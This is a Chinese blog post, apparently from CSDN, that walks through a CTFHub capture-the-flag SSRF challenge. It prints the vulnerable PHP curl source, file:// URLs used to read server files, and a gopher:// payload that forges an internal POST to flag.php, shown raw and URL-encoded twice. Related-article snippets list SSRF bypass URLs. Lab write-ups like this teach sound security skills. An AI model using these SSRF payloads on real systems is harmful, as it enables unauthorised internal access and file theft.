ctfhub:ssrf中的post题

最新推荐文章于 2024-07-01 13:37:03 发布
最新推荐文章于 2024-07-01 13:37:03 发布
阅读量1.1k 收藏 2
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30396927/article/details/116332684
版权

ctfhub:ssrf中的post题

开始通过尝试访问:
view-source:http://challenge-c2ada75a64aad599.sandbox.ctfhub.com:10080/?url=file:///var/www/html/index.php
ctrl+u查看网页代码获得

<?php

error_reporting(0);

if (!isset($_REQUEST['url'])) {  //判断传进来的url是否为空
    header("Location: /?url=_");
    exit;
}

$ch = curl_init();
//初始化新的会话,返回 cURL 句柄,供curl_setopt()、 curl_exec() 和 curl_close() 函数使用。

curl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);//设置URL到CURLOPT_URL

curl_setopt($ch, CURLOPT_HEADER, 0);//是否输出头信息到屏幕

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);//值被设置为1时将会根据服务器返回 HTTP 头中的 "Location: " 来重定向。

curl_exec($ch);// 抓取 URL 并把它传递给浏览器
curl_close($ch);// 关闭 cURL 资源,并且释放系统资源

在这里插入图片描述
由于基础差…看到这里有个让我疑惑了许久的问题,curl_exec($ch);网上给的解释是抓取URL并把它传递给浏览器,但在这个题里面抓的url是gopher://…吧,在浏览器中好像不能直接使用gopher协议的吧?
经过多番查阅,终于柳暗花明呐(抹一把辛酸泪),原因即curl_exec()是PHP cURL 中的函数,PHP cURL的函数要用到libcurl库,而libcurl库目前支持http、https、ftp、gopher、telnet、dict、file和ldap协议。如果没理解错的话,libcurl库就相当于php版的简约curl工具了吧。

然后访问:
view-source:http://challenge-c2ada75a64aad599.sandbox.ctfhub.com:10080/?url=file:///var/www/html/flag.php
获得

在这里插入图片描述

所以通过提示访问:
view-source:http://challenge-5a48635790814a6b.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.php
获得key
在这里插入图片描述

然后
gopher协议要构造的http包:

gopher://127.0.0.1:80/_POST /flag.php HTTP/1.1
Host:127.0.0.1
Content-Type:application/x-www-form-urlencoded
Content-Length:36

key=60a3e1206aa3977131856f0d5998415b

为解决数据传输过程中的解码问题,因此需要对其进行两次URL转码(因为没有二次编码,半天没出来flag,小伙伴们注意啦!)
一次URL编码(注:第一次编码要把%0a都替换成%0d%0a):

gopher://127.0.0.1:80/_POST%20/flag.php%20HTTP/1.1%0d%0AHost:127.0.0.1%0d%0AContent-Type:application/x-www-form-urlencoded%0d%0AContent-Length:36%0d%0A%0d%0Akey=60a3e1206aa3977131856f0d5998415b%0d%0a

二次URL编码:

gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250d%250AHost:127.0.0.1%250d%250AContent-Type:application/x-www-form-urlencoded%250d%250AContent-Length:36%250d%250A%250d%250Akey=60a3e1206aa3977131856f0d5998415b%250d%250a

获得flag
在这里插入图片描述
第一次写的不知道算不算wp的wp,改了又改,如有错误,欢迎批评指正。最后,建议看看下面大佬们的文章!
参考文章:
https://blog.csdn.net/Z_Grant/article/details/102913575
https://zhuanlan.zhihu.com/p/112055947
https://xz.aliyun.com/t/6235#toc-11
https://xz.aliyun.com/t/6373#toc-8
https://www.secpulse.com/archives/65832.html
https://blog.csdn.net/bmth666/article/details/104836708

临-界
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3860
CTFhub-ssrf-POST请求 解 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
lorsrf:SSRF参数蛮力
03-21
劳斯尔夫使用GET和POST方法对隐藏参数进行暴力破解以查找SSRF漏洞安装下载它➜ git clone https://github.com/knassar702/lorsrf➜ cd lorsrf➜ sudo pip3 install requests flask安装脚步 :恩格罗克运行您的ngrok ...
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1398
ctfhub ssrf post小记
CTFHUB-SSRF-POST请求
weixin_68416970的博客
06-22 429
CTFHUB靶场技能树-SSRF-POST请求的通关教程
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 2766
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解步骤 伪协议读取文件 解步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来 POST请求 注:途靶机重启过一次,网址有些改变,不要在意,看payload即可 解步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
CTFHUB-SSRF-POST请求(小宇特详解)
小宇的web博客
10-23 3479
CTFHUB-SSRF-POST请求 这里先说一下这里你需要知道的东西 而不是只会做,不知道其所以然 这里我先说一下这里里说的302跳转在这里发挥了什么作用 302跳转的302是http状态码 表示请求的网页自请求的网页移动到了新的位置,搜索引擎索引保存原来的URL 这里可以通过访问302.php,并且传参gopher来伪造本地访问 Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。随着HTTP协议的壮大,Gopher协议已经慢慢的淡出了我们的视线,但是Gop
CTFHubSSRF
qq_45927819的博客
03-28 6856
文章目录伪协议读取文件端口扫描POST请求上传文件 伪协议读取文件 根据目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体用法请参考: https://www.cnblogs.com/-mo-/p/11673190.html 网站的根目录一般都是在/var/www/html下 使用file:///协议 ?url=file:///var/ww
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 8118
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
CTFHUB技能树——SSRF(一)
2401_82985722的博客
05-21 1276
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
CTFHUB-SSRF-上传文件
weixin_68416970的博客
07-01 469
CTFHUB技能树、SSRF、上传文件的通关教程
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
SSRFTest:SSRF测试工具
05-04
''.join('x' % random.randrange(256) for i in xrange(32))在Python解释器,对import random; ''.join('x' % random.randrange(256) for i in xrange(32)) )) 将该字符串放入app.secret_key app.secret_key =...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
CTF库超详细资源合集
06-14
在传统的CTF线上⽐赛,Web类⽬是主要的型之⼀,相较于⼆进制、逆向等类型的⽬,参赛者不需掌握系统底层知识;相较于密码学、杂项问,不需具特别强的编程能⼒,故⼊门较为容易。Web类⽬常见的漏洞类型...
计算机系统结构(02325)自考真(201704)
最新发布
07-28
计算机系统结构(02325)自考真(201704) 计算机系统结构(Computer Architecture)也称为计算机体系结构,它是由计算机结构外特性,内特性,微外特性组成的。经典的计算机系统结构的定义是指计算机系统多级层次结构机器语言机器级的结构,它是软件和硬件/固件的主要交界面,是由机器语言程序、汇编语言源程序和高级语言源程序翻译生成的机器语言目标程序能在机器上正确运行所应具有的界面结构和功能。 计算机系统结构指的是什么? 是一台计算机的外表? 还是是指一台计算机内部的一块块板卡安放结构? 都不是,那么它是什么? 计算机系统结构就是计算机的机器语言程序员或编译程序编写者所看到的外特性。所谓外特性,就是计算机的概念性结构和功能特性。用一个不恰当的比喻一,比如动物吧,它的"系统结构"是指什么呢? 它的概念性结构和功能特性,就相当于动物的器官组成及其功能特性,如鸡有胃,胃可以消化食物。至于鸡的胃是什么形状的、鸡的胃部由什么组成就不是"系统结构"研究的问了。
国家电零售业上市公司融资问研究—以国美电器为例.docx
07-28
国家电零售业上市公司融资问研究—以国美电器为例.docx
python + opencv 加载 onnx 人脸检测模型识别人脸测试使用的 人脸照片
07-28
python + opencv 加载 onnx 人脸检测模型识别人脸测试使用的 人脸照片
CTFHub ssrf
07-29
- *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值